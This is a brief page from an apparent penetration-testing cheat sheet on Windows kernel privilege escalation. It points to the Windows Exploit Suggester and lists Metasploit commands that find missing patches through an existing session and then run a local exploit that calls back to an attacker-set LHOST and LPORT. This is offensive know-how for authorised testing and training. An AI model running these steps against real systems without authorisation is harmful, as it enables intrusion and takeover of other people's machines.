> For the complete documentation index, see [llms.txt](https://heinosass.gitbook.io/leet-sheet/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://heinosass.gitbook.io/leet-sheet/post-exploitation/untitled/windows-privilege-escalation/kernel-exploits.md).

# Kernel Exploits

## Windows Exploit Suggester

You can run the windows exploit suggester script to check for missing patches.

{% embed url="<https://github.com/AonCyberLabs/Windows-Exploit-Suggester>" %}

## Metasploit Exploit Suggester

Not sure if it's the same one as the Windows Exploit Suggester, but there's also one built into metasploit.

Once you have a metasploit session, you can run the exploit suggester:&#x20;

```
use post/multi/recon/local_exploit_suggester
set SESSION SESSION_NUMBER_HERE
run 
```

Then you can use the exploit it found:&#x20;

```
use exploit/windows/local/EXPLOIT_NAME_HERE 
set SESSION 1 
set LHOST YOUR_IP_HERE 
set LPORT SOME_OPEN_PORT 
run
```
